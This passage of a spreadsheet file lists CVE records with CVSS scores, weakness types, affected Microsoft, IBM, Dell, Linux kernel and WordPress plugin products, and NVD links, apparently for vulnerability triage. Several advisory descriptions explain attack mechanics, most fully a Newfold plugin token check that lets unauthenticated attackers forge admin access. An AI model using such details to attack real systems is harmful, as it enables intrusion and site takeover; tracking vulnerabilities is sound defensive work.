        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79744</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80074</t>
        </is>
      </c>
      <c r="C1002" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1002" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1002" s="5" t="inlineStr"/>
      <c r="F1002" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1002" s="5" t="inlineStr"/>
      <c r="H1002" s="5" t="inlineStr"/>
      <c r="I1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1002" s="5" t="inlineStr"/>
      <c r="K1002" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1002" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80074</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80077</t>
        </is>
      </c>
      <c r="C1003" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1003" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1003" s="5" t="inlineStr"/>
      <c r="F1003" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1003" s="5" t="inlineStr"/>
      <c r="H1003" s="5" t="inlineStr"/>
      <c r="I1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1003" s="5" t="inlineStr"/>
      <c r="K1003" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1003" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80077</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80080</t>
        </is>
      </c>
      <c r="C1004" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1004" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1004" s="5" t="inlineStr"/>
      <c r="F1004" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1004" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1004" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1004" s="5" t="inlineStr"/>
      <c r="K1004" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1004" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80080</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80081</t>
        </is>
      </c>
      <c r="C1005" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1005" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1005" s="5" t="inlineStr"/>
      <c r="F1005" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1005" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1005" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps</t>
        </is>
      </c>
      <c r="I1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1005" s="5" t="inlineStr"/>
      <c r="K1005" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1005" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80081</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80083</t>
        </is>
      </c>
      <c r="C1006" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1006" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1006" s="5" t="inlineStr"/>
      <c r="F1006" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1006" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1006" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1006" s="5" t="inlineStr"/>
      <c r="K1006" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1006" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80085</t>
        </is>
      </c>
      <c r="C1007" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1007" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1007" s="5" t="inlineStr"/>
      <c r="F1007" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1007" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1007" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1007" s="5" t="inlineStr"/>
      <c r="K1007" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1007" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80085</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1008" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80096</t>
        </is>
      </c>
      <c r="C1008" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1008" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1008" s="5" t="inlineStr"/>
      <c r="F1008" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1008" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H100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08" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1008" s="5" t="inlineStr"/>
      <c r="K1008" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1008" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1008" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t>
        </is>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1009" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80099</t>
        </is>
      </c>
      <c r="C1009" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1009" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1009" s="5" t="inlineStr"/>
      <c r="F1009" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1009" s="5" t="inlineStr"/>
      <c r="H1009" s="5" t="inlineStr"/>
      <c r="I1009" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1009" s="5" t="inlineStr"/>
      <c r="K1009" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1009" s="5" t="inlineStr">
        <is>
          <t>Several Newfold plugins are vulnerable to Authentication Bypass. The vulnerability exists because the plugins bundle the wp-module-data module. In the module, the `authenticate()` method — registered on the `rest_authentication_errors` filter and therefore evaluated for every unauthenticated REST API request — performs an HMAC-style Bearer token comparison that degenerates when `HiiveConnection::get_auth_token()` returns `false`: PHP coerces `strrev(false)` to `strrev('')`, collapsing the secret salt to the publicly known constant `hash('sha256', '') = e3b0c44...`, while all remaining hash inputs (HTTP method, request URL, raw request body, and the `X-Timestamp` header) remain fully attacker-controlled. This makes it possible for unauthenticated attackers to compute a valid Bearer token entirely offline, pass the token equality check, and have `wp_set_current_user()` invoked against the first administrator returned by `get_users(['role' =&gt; 'administrator'])`, granting full administrator-level access and enabling arbitrary REST API operations such as creating new administrator accounts and achieving complete site takeover. Vulnerable versions are WP Plugin Crazy Domains (&lt;= 2.5.2), WP Plugin Web (&lt;= 2.3.4), WP Plugin Hostgator (&lt;= 3.1.0), WP Plugin Bluehost (&lt;= 4.17.1). The affected module is vulnerable in versions up to, and including, 2.9.4.</t>
        </is>
      </c>
      <c r="M1009" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80099</t>
        </is>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1010" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80130</t>
        </is>
      </c>
      <c r="C1010" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1010" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1010" s="5" t="inlineStr"/>
      <c r="F1010" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1010" s="5" t="inlineStr"/>
      <c r="H1010" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I1010" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1010" s="5" t="inlineStr"/>
      <c r="K1010" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L1010" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Relative Path Traversal vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to remote execution.</t>
        </is>
      </c>
      <c r="M1010" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80130</t>
        </is>
      </c>
    </row>
    <row r="1011">
      <c r="A1011" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1011" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80465</t>
        </is>
      </c>
      <c r="C1011" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1011" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1011" s="5" t="inlineStr"/>
      <c r="F1011" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1011" s="5" t="inlineStr"/>
      <c r="H1011" s="5" t="inlineStr"/>
      <c r="I1011" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1011" s="5" t="inlineStr"/>
      <c r="K1011" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1011" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Mendix SAML (Mendix 10 compatible) (All versions &lt; V4.2.3), Mendix SAML (Mendix 11 compatible) (All versions &lt; V4.2.3), Mendix SAML (Mendix 9.24 compatible) (All versions &lt; V3.6.27). Affected versions of the module do not properly validate the SAML response signature. This could allow unauthenticated remote attackers to hijack an account (session) in specific SSO configurations.</t>
        </is>
      </c>
      <c r="M1011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80465</t>
        </is>
      </c>
    </row>
    <row r="1012">
      <c r="A1012" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80914</t>
        </is>
      </c>
      <c r="C1012" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1012" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1012" s="5" t="inlineStr"/>
      <c r="F1012" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1012" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1012" s="5" t="inlineStr"/>
      <c r="I1012" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1012" s="5" t="inlineStr"/>
      <c r="K1012" s="5" t="inlineStr"/>
      <c r="L1012" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: ISO: fix use-after-free of listener socket in iso_conn_ready
iso_conn_ready() looks up the BIS listener socket with iso_get_sock(),
which takes a reference, and then, without re-checking its state,
creates a child socket from it:
    parent = iso_get_sock(hdev, ...);
    if (!parent)
        return;
    lock_sock(parent);
    sk = iso_sock_alloc(sock_net(parent), NULL, BTPROTO_ISO, ...);
    ...
    iso_chan_add(conn, sk, parent);
    ...
    release_sock(parent);
    sock_put(parent);
If the listener socket is closed concurrently, between iso_get_sock()
and lock_sock(), the reference taken by iso_get_sock() may be the last
one: the close path drops the link-list reference, and once
iso_conn_ready() drops its own reference at the end of the function the
socket is freed.  The child socket, however, is already linked to the
freed parent, and a later disconnect of the child runs iso_chan_del()
-&gt; bt_accept_unlink(), which dereferences the dangling parent pointer
into the freed accept queue (a use-after-free).  The same dangling
pointer is also dereferenced through parent-&gt;***() in
iso_chan_del().
Fix it the same way the connected (non-BIS) path was fixed in commit
0d255e63fcf3 ("Bluetooth: ISO: hold sk properly in iso_conn_ready"):
after taking the socket lock, re-check that the parent is still a
listening, alive socket, and bail out otherwise.</t>
        </is>
      </c>
      <c r="M1012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80914</t>
        </is>
      </c>
    </row>
    <row r="1013">
      <c r="A1013" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80921</t>
        </is>
      </c>
      <c r="C1013" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1013" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1013" s="5" t="inlineStr"/>
      <c r="F1013" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1013" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1013" s="5" t="inlineStr"/>
      <c r="I1013" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1013" s="5" t="inlineStr"/>
      <c r="K1013" s="5" t="inlineStr"/>
      <c r="L1013" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: s390: vsie: zero stale crypto bits
When shadowing crypto access bits from a format0 apcb (crycb 0 or 1),
the bits 64..255 are unchanged from whatever is in the vsie page in the
crycb and thus in the apcb. This gives a nested guest potential access
to a device no longer available. Zero out the remaining bits.</t>
        </is>
      </c>
      <c r="M1013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80921</t>
        </is>
      </c>
    </row>
    <row r="1014">
      <c r="A1014" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81211</t>
        </is>
      </c>
      <c r="C1014" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1014" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1014" s="5" t="inlineStr"/>
      <c r="F1014" s="5" t="inlineStr"/>
      <c r="G1014" s="5" t="inlineStr">
        <is>
          <t>ibm, python</t>
        </is>
      </c>
      <c r="H1014" s="5" t="inlineStr"/>
      <c r="I1014" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1014" s="5" t="inlineStr"/>
      <c r="K1014" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1014" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary Python code due to improper authorization of custom components in stored flows.</t>
        </is>
      </c>
      <c r="M1014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81211</t>
        </is>
      </c>
    </row>
    <row r="1015">
      <c r="A1015" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81352</t>
        </is>
      </c>
      <c r="C1015" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1015" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1015" s="5" t="inlineStr"/>
      <c r="F1015" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1015" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1015" s="5" t="inlineStr"/>
      <c r="I1015" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1015" s="5" t="inlineStr"/>
      <c r="K1015" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1015" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81352</t>
        </is>
      </c>
    </row>
    <row r="1016">
      <c r="A1016" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81385</t>
        </is>
      </c>
      <c r="C1016" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1016" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1016" s="5" t="inlineStr"/>
      <c r="F1016" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1016" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1016" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="I1016" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1016" s="5" t="inlineStr"/>
      <c r="K1016" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1016" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81385</t>
        </is>
      </c>
    </row>
    <row r="1017">
      <c r="A1017" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81543</t>
        </is>
      </c>
      <c r="C1017" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1017" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1017" s="5" t="inlineStr"/>
      <c r="F1017" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1017" s="5" t="inlineStr"/>
      <c r="H1017" s="5" t="inlineStr"/>
      <c r="I1017" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1017" s="5" t="inlineStr"/>
      <c r="K1017" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1017" s="5" t="inlineStr">
        <is>
          <t>The Abandoned Cart Pro for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 10.7.1. This is due to missing capability checks and nonce verification on multiple AJAX actions including wcap_save_connector_settings, wcap_send_manual_email, wcap_abandoned_cart_info, and wcap_change_manual_email_data. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify SMTP connector settings to route administrator recovery emails through an attacker-controlled server and intercept auto-login links to gain full administrative access. The plugin's auto-login feature must be enabled, which is the default configuration.</t>
        </is>
      </c>
      <c r="M1017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81543</t>
        </is>
      </c>
    </row>
    <row r="1018">
      <c r="A1018" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81550</t>
        </is>
      </c>
      <c r="C1018" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1018" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1018" s="5" t="inlineStr"/>
      <c r="F1018" s="5" t="inlineStr"/>
      <c r="G1018" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1018" s="5" t="inlineStr"/>
      <c r="I1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1018" s="5" t="inlineStr"/>
      <c r="K1018" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1018" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M1018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81550</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81551</t>
        </is>
      </c>
      <c r="C1019" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1019" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1019" s="5" t="inlineStr"/>
      <c r="F1019" s="5" t="inlineStr"/>
      <c r="G1019" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1019" s="5" t="inlineStr"/>
      <c r="I1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1019" s="5" t="inlineStr"/>
      <c r="K1019" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1019" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to arbitrarily write to or delete files on shared storage due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M1019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81551</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81554</t>
        </is>
      </c>
      <c r="C1020" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1020" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1020" s="5" t="inlineStr"/>
      <c r="F1020" s="5" t="inlineStr"/>
      <c r="G1020" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1020" s="5" t="inlineStr"/>
      <c r="I1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1020" s="5" t="inlineStr"/>
      <c r="K1020" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1020" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information due to an absolute-path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M1020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81554</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81940</t>
        </is>
      </c>
      <c r="C1021" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1021" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1021" s="5" t="inlineStr"/>
      <c r="F1021" s="5" t="inlineStr"/>
      <c r="G1021" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1021" s="5" t="inlineStr"/>
      <c r="I1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1021" s="5" t="inlineStr"/>
      <c r="K1021" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1021" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to improper neutralization of special characters in flow display names.</t>
        </is>
      </c>
      <c r="M1021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81940</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81941</t>
        </is>
      </c>
      <c r="C1022" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1022" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1022" s="5" t="inlineStr"/>
      <c r="F1022" s="5" t="inlineStr"/>
      <c r="G1022" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1022" s="5" t="inlineStr"/>
      <c r="I1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1022" s="5" t="inlineStr"/>
      <c r="K1022" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1022"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M1022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81941</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81952</t>
        </is>
      </c>
      <c r="C1023" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1023" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
